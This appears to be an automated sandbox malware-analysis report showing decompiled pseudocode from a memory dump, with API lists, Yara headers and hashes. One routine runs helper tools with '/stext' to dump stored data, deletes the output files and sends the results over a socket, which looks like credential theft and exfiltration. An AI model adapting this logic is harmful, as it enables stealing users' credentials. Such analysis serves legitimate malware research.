                    								_t242 = _t241 | E004516F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                    								_t243 = _t242 | E004516F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                    								_t244 = _t243 | E004516F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                    								_t245 = _t244 | E004516F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                    								_t246 = _t245 | E004516F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                    								_t247 = _t246 | E004516F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                    								_t248 = _t247 | E004516F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                    								_t249 = _t248 | E004516F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                    								_t250 = _t249 | E004516F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                    								_t251 = _t250 | E004516F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                    								_t252 = _t251 | E004516F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                    								_t253 = _t252 | E004516F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                    								_t254 = _t253 | E004516F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                    								_t255 = _t254 | E004516F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                    								_t256 = _t255 | E004516F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                    								if((E004516F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                    									_t226 =  *_v20;
                    									while( *_t226 != 0) {
                    										_t195 =  *_t226;
                    										if(_t195 < 0x30 || _t195 > 0x39) {
                    											if(_t195 != 0x3b) {
                    												goto L17;
                    											}
                    											_t257 = _t226;
                    											do {
                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                    												_t257 = _t257 + 1;
                    											} while ( *_t257 != 0);
                    										} else {
                    											 *_t226 = _t195 - 0x30;
                    											L17:
                    											_t226 = _t226 + 1;
                    										}
                    									}
                    									goto L25;
                    								}
                    								E0044ED82(_v8);
                    								E00445002(_v8);
                    								E00445002(_v12);
                    								E00445002(_v16);
                    								goto L4;
                    							}
                    							E00445002(_t234);
                    							E00445002(_v12);
                    							L7:
                    							goto L4;
                    						}
                    						E00445002(_t234);
                    						goto L7;
                    					}
                    					L4:
                    					return 1;
                    				} else {
                    					_t231 = 0;
                    					_v12 = 0;
                    					_t236 = 0x46f188;
                    					L27:
                    					_t105 =  *(_t210 + 0x84);
                    					if(_t105 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t105 | 0xffffffff) == 0) {
                    							E00445002( *(_t210 + 0x88));
                    							E00445002( *((intOrPtr*)(_t210 + 0x7c)));
                    						}
                    					}
                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                    					 *(_t210 + 0x84) = _t231;
                    					 *(_t210 + 0x88) = _t236;
                    					return 0;
                    				}
                    			}













































                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                    • Instruction ID: f43520f85eab2823aefddca190de3c75bdb19f5807818d4f337798dcfd7c07fb
                    • Opcode Fuzzy Hash: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                    • Instruction Fuzzy Hash: 18C14476E40205AFEB20DBA9CC42FEF77F8AB18704F14416AFA04FB286D6749D458764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00411FF7() {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t165;
                    				void* _t168;
                    				void* _t174;
                    				void* _t180;
                    				void* _t186;
                    				void* _t192;
                    				void* _t198;
                    				void* _t212;
                    				void* _t217;
                    				void* _t222;
                    				void* _t223;
                    				void* _t254;
                    				void* _t255;
                    				void* _t291;
                    				void* _t292;
                    				void* _t293;
                    				void* _t294;
                    				char _t298;
                    				intOrPtr _t300;
                    				void* _t474;
                    				void* _t494;
                    				void* _t500;
                    				void* _t504;
                    				void* _t505;
                    				void* _t506;
                    				void* _t507;
                    				intOrPtr _t519;
                    
                    				GetModuleFileNameW(0, _t505 + 0x178, 0x104);
                    				E004020BF(_t291, _t505 + 0xf8);
                    				E004020BF(_t291, _t505 + 0xe0);
                    				E004020BF(_t291, _t505 + 0xc8);
                    				_t494 = Sleep;
                    				_t504 = 0;
                    				do {
                    					 *((char*)(_t505 + 0x1b)) = 0;
                    					 *((char*)(_t505 + 0x19)) = 0;
                    					 *((char*)(_t505 + 0x1a)) = 0;
                    					E0040CEEC(_t505 + 0xb4, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
                    					E00401FB8();
                    					E0040CEEC(_t505 + 0x9c, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
                    					E00401FB8();
                    					_t165 = E00401F8B(E0041A4D3(_t505 + 0x1c));
                    					_t459 = 0x30;
                    					E0040CEEC(_t505 + 0x84, 0x30, _t165);
                    					E00401FB8();
                    					_t292 = 0;
                    					while(1) {
                    						_t168 = E00401F8B(_t505 + 0x3c8);
                    						_t174 = E00401EE4(E00402FF4(_t292, _t505 + 0x20, E004042FD(_t292, _t505 + 0x58, E004042DC(_t292, _t505 + 0x74, _t505 + 0x194, _t504, 0, E0040415E(_t292, _t505 + 0x38, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0xb4), _t494, _t504, 0, "\""));
                    						_t459 = _t168;
                    						 *((char*)(_t505 + 0x16)) = E00417456(_t174);
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						if( *((char*)(_t505 + 0x16)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t292 = _t292 + 1;
                    						if(_t292 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t293 = 0;
                    					while(1) {
                    						_t180 = E00401F8B(_t505 + 0x3f8);
                    						_t186 = E00401EE4(E00402FF4(_t293, _t505 + 0x3c, E004042FD(_t293, _t505 + 0x70, E004042DC(_t293, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t293, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x9c), _t494, _t504, 0, "\""));
                    						_t459 = _t180;
                    						 *((char*)(_t505 + 0x18)) = E00417456(_t186);
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						if( *((char*)(_t505 + 0x18)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t293 = _t293 + 1;
                    						if(_t293 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t294 = 0;
                    					while(1) {
                    						_t192 = E00401F8B(_t505 + 0x3e0);
                    						_t198 = E00401EE4(E00402FF4(_t294, _t505 + 0x3c, E004042FD(_t294, _t505 + 0x70, E004042DC(_t294, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t294, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x84), _t494, _t504, 0, "\""));
                    						_t459 = _t192;
                    						 *((char*)(_t505 + 0x17)) = E00417456(_t198);
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						if( *((char*)(_t505 + 0x17)) != 0) {
                    							break;
                    						}
                    						Sleep(0xa);
                    						_t294 = _t294 + 1;
                    						if(_t294 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t519 =  *((intOrPtr*)(_t505 + 0x16));
                    					_t60 = (0 | _t519 == 0x00000000) + 1; // 0x1
                    					_t62 = ( !=  ? _t519 == 0 : _t60) + 1; // 0x2
                    					_t296 =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                    					_t500 = 0;
                    					 *((intOrPtr*)(_t505 + 0x34)) =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                    					while(1) {
                    						E00401EE4(_t505 + 0xb0);
                    						if(E0041ADFE(_t505 + 0xf8) != 0) {
                    							DeleteFileW(E00401EE4(_t505 + 0xb0));
                    						}
                    						E00401EE4(_t505 + 0x80);
                    						if(E0041ADFE(_t505 + 0xe0) == 0) {
                    							_t298 =  *((intOrPtr*)(_t505 + 0x19));
                    						} else {
                    							_t298 = 1;
                    							 *((char*)(_t505 + 0x19)) = 1;
                    							DeleteFileW(E00401EE4(_t505 + 0x80));
                    						}
                    						E00401EE4(_t505 + 0x98);
                    						_t471 = _t505 + 0xc8;
                    						if(E0041ADFE(_t505 + 0xc8) != 0) {
                    							 *((char*)(_t505 + 0x1a)) = 1;
                    							DeleteFileW(E00401EE4(_t505 + 0x98));
                    						}
                    						if(_t298 != 0 && _t298 != 0 &&  *((char*)(_t505 + 0x1a)) != 0) {
                    							break;
                    						}
                    						Sleep(0x1f4);
                    						_t500 = _t500 + 1;
                    						if(_t500 < 0xa) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_t212 = E0040619C();
                    					_t300 =  *((intOrPtr*)(_t505 + 0x34));
                    					if(_t212 == 0 || E0040619C() == 0 || E0040619C() == 0) {
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    					} else {
                    						goto L25;
                    					}
                    					L28:
                    					E0040AE7E(_t300, _t505 + 0x118, _t471, _t494, _t504, 0x2710, 0);
                    					_t217 = E00401EE4(_t505 + 0x110);
                    					_t506 = _t505 - 0x18;
                    					E004020D6(_t300, _t506, _t471, _t533, _t506 + 0x428);
                    					E00412770(_t506 + 0x50, _t217, _t217, _t504);
                    					_t507 = _t506 + 0x18;
                    					E00401EE9();
                    					_t222 = E00405AE5("0");
                    					_t474 = _t507 + 0x110;
                    					_t534 = _t222;
                    					if(_t222 == 0) {
                    						_t223 = E0041A879(_t300, _t507 + 0x1c, _t474);
                    						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x190, E00402EF0(_t300, _t508 + 0x17c, E00402EF0(_t300, _t508 + 0x168, E00402EF0(_t300, _t508 + 0x154, E00402EF0(_t300, _t508 + 0x68, E00402EF0(_t300, _t508 + 0x9c, E00402F11(_t507 - 0x18 + 0x68, _t507 - 0x18 + 0x3c8, _t504, 0x472ec8), _t504, __eflags, _t508 + 0x128), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0x108), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0xe8), _t504, __eflags, 0x472ec8), _t223);
                    						_push(0x6a);
                    						E00404A81(0x473388, _t233, __eflags);
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    					} else {
                    						_t254 = E0041A879(_t300, _t507 + 0x170, _t474);
                    						_t508 = _t507 - 0x18;
                    						_t255 = E0041A6E9(_t300, _t507 - 0x18 + 0x170, _t300);
                    						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x58, E00402E81(_t508 + 0x8c, E00402EF0(_t300, _t508 + 0x78, E00402EF0(_t300, _t508 + 0x48, E00402EF0(_t300, _t508 + 0xe0, E00402EF0(_t300, _t508 + 0xcc, E00402EF0(_t300, _t508 + 0xb8, E00402EF0(_t300, _t508 + 0x164, E00402F11(_t508 + 0x180, _t508 + 0x3f0, _t504, 0x472ec8), _t504, _t534, _t508 + 0x130), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0x110), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0xf0), _t504, _t534, 0x472ec8), _t255), _t504, _t534, 0x472ec8), _t254);
                    						_push(0x69);
                    						E00404A81(0x473388, _t267, _t534);
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    						E00401FB8();
                    					}
                    					E00401FB8();
                    					E00401EE9();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					return E00401FB8();
                    					L25:
                    					Sleep(0x64);
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					_t504 = _t504 + 1;
                    					_t533 = _t504 - 0xa;
                    				} while (_t504 < 0xa);
                    				goto L28;
                    			}

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412010
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                    • Sleep.KERNEL32(0000000A,00463E44), ref: 00412162
                    • Sleep.KERNEL32(0000000A,00463E44,00463E44), ref: 00412204
                    • Sleep.KERNEL32(0000000A,00463E44,00463E44,00463E44), ref: 004122A6
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 00412308
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041233F
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041237B
                    • Sleep.KERNEL32(000001F4,00463E44,00463E44,00463E44), ref: 00412395
                    • Sleep.KERNEL32(00000064), ref: 004123D7
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "
                    • API String ID: 1223786279-3856184850
                    • Opcode ID: 089e6abb93f4f8d39ae8831357fffea25337ca4732c3d5964ef3bf405c68efd5
                    • Instruction ID: fc4ad0b7eed9c60d5fc35351bb25392cbbf70f9ec0b82e477513c0ff0abfdd60
                    • Opcode Fuzzy Hash: 089e6abb93f4f8d39ae8831357fffea25337ca4732c3d5964ef3bf405c68efd5
                    • Instruction Fuzzy Hash: A70246315083414AC328FB61D891AEFB3D5AFD4348F50493FF48A931E2EF789A49C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E004544DC(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v36;
                    				signed int _v44;
                    				void _v48;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t114;
                    				signed int _t123;
                    				signed char _t124;
                    				signed int _t134;
                    				intOrPtr _t164;
                    				intOrPtr _t180;
                    				signed int* _t190;
                    				signed int _t192;
                    				char _t197;
                    				signed int _t203;
                    				signed int _t206;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t219;
                    				signed int _t225;
                    				signed int _t227;
                    				signed int _t234;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed char _t242;
                    				intOrPtr _t245;
                    				void* _t248;
                    				void* _t252;
                    				void* _t262;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t270;
                    				void* _t272;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				void* _t284;
                    
                    				_t262 = E0045423F(__ecx,  &_v72, _a16, _a20, _a24);
                    				_t192 = 6;
                    				memcpy( &_v48, _t262, _t192 << 2);
                    				_t274 = _t272 + 0x1c;
                    				_t248 = _t262 + _t192 + _t192;
                    				_t263 = _t262 | 0xffffffff;
                    				if(_v36 != _t263) {
                    					_t114 = E0044EB75(_t248, _t263, __eflags);
                    					_t190 = _a8;
                    					 *_t190 = _t114;
                    					__eflags = _t114 - _t263;
                    					if(_t114 != _t263) {
                    						_v20 = _v20 & 0x00000000;
                    						_v24 = 0xc;
                    						_t275 = _t274 - 0x18;
                    						 *_a4 = 1;
                    						_push(6);
                    						_v16 =  !(_a16 >> 7) & 1;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t275,  &_v48, 1 << 2);
                    						_t197 = 0;
                    						_t252 = E004541AA();
                    						_t277 = _t275 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							L11:
                    							_t123 = GetFileType(_t252);
                    							__eflags = _t123;
                    							if(_t123 != 0) {
                    								__eflags = _t123 - 2;
                    								if(_t123 != 2) {
                    									__eflags = _t123 - 3;
                    									_t124 = _v48;
                    									if(_t123 == 3) {
                    										_t124 = _t124 | 0x00000008;
                    										__eflags = _t124;
                    									}
                    								} else {
                    									_t124 = _v48 | 0x00000040;
                    								}
                    								_v5 = _t124;
                    								E0044EABE(_t197,  *_t190, _t252);
                    								_t242 = _v5 | 0x00000001;
                    								_v5 = _t242;
                    								_v48 = _t242;
                    								 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                    								_t203 =  *_t190;
                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                    								__eflags = _a16 & 0x00000002;
                    								 *((char*)( *((intOrPtr*)(0x470810 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                    								if((_a16 & 0x00000002) == 0) {
                    									L20:
                    									_v6 = 0;
                    									_push( &_v6);
                    									_push(_a16);
                    									_t278 = _t277 - 0x18;
                    									_t206 = 6;
                    									_push( *_t190);
                    									memcpy(_t278,  &_v48, _t206 << 2);
                    									_t134 = E00453F5D(_t190,  &_v48 + _t206 + _t206,  &_v48);
                    									_t280 = _t278 + 0x30;
                    									__eflags = _t134;
                    									if(__eflags == 0) {
                    										 *((char*)( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                    										 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                    										__eflags = _v5 & 0x00000048;
                    										if((_v5 & 0x00000048) == 0) {
                    											__eflags = _a16 & 0x00000008;
                    											if((_a16 & 0x00000008) != 0) {
                    												_t225 =  *_t190;
                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                    												_t164 =  *((intOrPtr*)(0x470810 + (_t225 >> 6) * 4));
                    												_t87 = _t164 + _t227 + 0x28;
                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                    												__eflags =  *_t87;
                    											}
                    										}
                    										_t266 = _v44;
                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                    											L31:
                    											__eflags = 0;
                    											return 0;
                    										} else {
                    											__eflags = _a16 & 0x00000001;
                    											if((_a16 & 0x00000001) == 0) {
                    												goto L31;
                    											}
                    											CloseHandle(_v12);
                    											_v44 = _t266 & 0x7fffffff;
                    											_t215 = 6;
                    											_push( &_v24);
                    											_push(_a12);
                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                    											_t245 = E004541AA();
                    											__eflags = _t245 - 0xffffffff;
                    											if(_t245 != 0xffffffff) {
                    												_t217 =  *_t190;
                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                    												__eflags = _t219;
                    												 *((intOrPtr*)( *((intOrPtr*)(0x470810 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                    												goto L31;
                    											}
                    											E0043EE77(GetLastError());
                    											 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    											E0044EC87( *_t190);
                    											L10:
                    											goto L2;
                    										}
                    									}
                    									_t269 = _t134;
                    									goto L22;
                    								} else {
                    									_t269 = E004543BB(_t205,  *_t190);
                    									__eflags = _t269;
                    									if(__eflags != 0) {
                    										L22:
                    										E0044A5EC(__eflags,  *_t190);
                    										return _t269;
                    									}
                    									goto L20;
                    								}
                    							}
                    							_t270 = GetLastError();
                    							E0043EE77(_t270);
                    							 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    							CloseHandle(_t252);
                    							__eflags = _t270;
                    							if(_t270 == 0) {
                    								 *((intOrPtr*)(E0043EEAD())) = 0xd;
                    							}
                    							goto L2;
                    						}
                    						_t234 = _v44;
                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                    							L9:
                    							_t235 =  *_t190;
                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                    							_t180 =  *((intOrPtr*)(0x470810 + (_t235 >> 6) * 4));
                    							_t33 = _t180 + _t237 + 0x28;
                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                    							__eflags =  *_t33;
                    							E0043EE77(GetLastError());
                    							goto L10;
                    						}
                    						__eflags = _a16 & 0x00000001;
                    						if((_a16 & 0x00000001) == 0) {
                    							goto L9;
                    						}
                    						_t284 = _t277 - 0x18;
                    						_v44 = _t234 & 0x7fffffff;
                    						_t239 = 6;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t284,  &_v48, _t239 << 2);
                    						_t197 = 0;
                    						_t252 = E004541AA();
                    						_t277 = _t284 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							goto L11;
                    						}
                    						goto L9;
                    					} else {
                    						 *(E0043EE9A()) =  *_t186 & 0x00000000;
                    						 *_t190 = _t263;
                    						 *((intOrPtr*)(E0043EEAD())) = 0x18;
                    						goto L2;
                    					}
                    				} else {
                    					 *(E0043EE9A()) =  *_t188 & 0x00000000;
                    					 *_a8 = _t263;
                    					L2:
                    					return  *((intOrPtr*)(E0043EEAD()));
                    				}
                    			}

                    APIs
                      • Part of subcall function 004541AA: CreateFileW.KERNEL32(00000000,00000000,?,00454585,?,?,00000000,?,00454585,00000000,0000000C), ref: 004541C7
                    • GetLastError.KERNEL32 ref: 004545F0
                    • __dosmaperr.LIBCMT ref: 004545F7
                    • GetFileType.KERNEL32(00000000), ref: 00454603
                    • GetLastError.KERNEL32 ref: 0045460D
                    • __dosmaperr.LIBCMT ref: 00454616
                    • CloseHandle.KERNEL32(00000000), ref: 00454636
                    • CloseHandle.KERNEL32(?), ref: 00454780
                    • GetLastError.KERNEL32 ref: 004547B2
                    • __dosmaperr.LIBCMT ref: 004547B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                    • Instruction ID: e7023db14128a88f38c155e4c92a359c255939900931c8e81202aef98a64c706
                    • Opcode Fuzzy Hash: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                    • Instruction Fuzzy Hash: 49A148319141089FDF199F68DC517AE3BA0AF4A329F14015EFC11DF392D7388856CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 38%
                    			E00413EF7(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
                    				intOrPtr _v0;
                    				short _v4;
                    				char _v8;
                    				char* _v12;
                    				signed short _v20;
                    				intOrPtr _v24;
                    				char _t36;
                    				short _t37;
                    				intOrPtr* _t44;
                    				void* _t47;
                    				void* _t49;
                    				char* _t52;
                    				signed short* _t58;
                    				signed char _t63;
                    				intOrPtr _t64;
                    				signed short _t69;
                    				void* _t71;
                    				void* _t72;
                    				intOrPtr _t73;
                    				intOrPtr* _t74;
                    				intOrPtr _t76;
                    				void* _t77;
                    
                    				_t77 =  &_v12;
                    				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
                    				_v8 = _t36;
                    				_t37 =  *0x46a5f0; // 0x35
                    				_t74 = _a4;
                    				_v4 = _t37;
                    				_v12 =  &_v8;
                    				if(_t74 == 0 || _a8 < 0x10) {
                    					L42:
                    					return 0x2afb;
                    				} else {
                    					_t71 = 2;
                    					if( *_t74 != _t71) {
                    						return 0x273f;
                    					}
                    					_t76 = _a24;
                    					_t64 = _a20;
                    					_t73 = _a16;
                    					if(_a12 == 0 || _t73 == 0) {
                    						if(_t64 == 0 || _t76 == 0) {
                    							return 0x2af9;
                    						} else {
                    							goto L8;
                    						}
                    					} else {
                    						L8:
                    						_t63 = _a28;
                    						_t42 = _t63 & 0x00000006;
                    						if((_t63 & 0x00000006) != 6) {
                    							if(_t64 == 0 || _t76 == 0) {
                    								L21:
                    								if(_a12 == 0 || _t73 == 0) {
                    									L40:
                    									return 0;
                    								} else {
                    									_t44 =  *((intOrPtr*)(_t74 + 4));
                    									_a4 = _t44;
                    									if((_t63 & 0x00000002) == 0) {
                    										_t44 =  &_a4;
                    										__imp__#51(_t44, 4, _t71);
                    										if(_t44 == 0) {
                    											L30:
                    											if((_t63 & 0x00000004) == 0) {
                    												_push(_v8);
                    												L37:
                    												__imp__#12();
                    												_t75 = _t44;
                    												L38:
                    												if(_t73 <= E00439290(_t75)) {
                    													goto L42;
                    												}
                    												E0044030E(_v4, _t73, _t75);
                    												goto L40;
                    											}
                    											__imp__#111();
                    											_t47 = _t44 - 0x2af9;
                    											if(_t47 == 0) {
                    												L34:
                    												return 0x2af9;
                    											}
                    											_t49 = _t47 - 1;
                    											if(_t49 == 0) {
                    												return 0x2afa;
                    											}
                    											if(_t49 == 1) {
                    												goto L42;
                    											}
                    											goto L34;
                    										}
                    										_t75 =  *_t44;
                    										if( *_t44 == 0) {
                    											goto L30;
                    										}
                    										if((_t63 & 0x00000001) != 0) {
                    											_t52 = L00413895(_t75, 0x2e);
                    											if(_t52 != 0) {
                    												 *_t52 = 0;
                    											}
                    										}
                    										goto L38;
                    									}
                    									_push(_t44);
                    									goto L37;
                    								}
                    							} else {
                    								_t69 =  *(_t74 + 2) & 0x0000ffff;
                    								_a8 = _t69;
                    								if((_t63 & 0x00000008) == 0) {
                    									_t72 = 0;
                    									_t54 =  ==  ? _t72 : "udp";
                    									_t42 = _t69 & 0x0000ffff;
                    									__imp__#56(_t42,  ==  ? _t72 : "udp");
                    									if(_t42 == 0) {
                    										L17:
                    										_push(_v0);
                    										L18:
                    										__imp__#15();
                    										E0041391A( &_v20, 6, "%u", _t42 & 0x0000ffff);
                    										_t58 =  &_v20;
                    										_t77 = _t77 + 0x10;
                    										L19:
                    										if(_t76 <= E00439290(_t58)) {
                    											goto L42;
                    										}
                    										E0044030E(_a8, _t76, _v24);
                    										_t77 = _t77 + 0xc;
                    										_t71 = 2;
                    										goto L21;
                    									}
                    									_t42 =  *_t42;
                    									if(_t42 == 0) {
                    										goto L17;
                    									}
                    									_v20 = _t42;
                    									goto L19;
                    								}
                    								_push(_t69);
                    								goto L18;
                    							}
                    						}
                    						return 0x2726;
                    					}
                    				}
                    			}


























                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
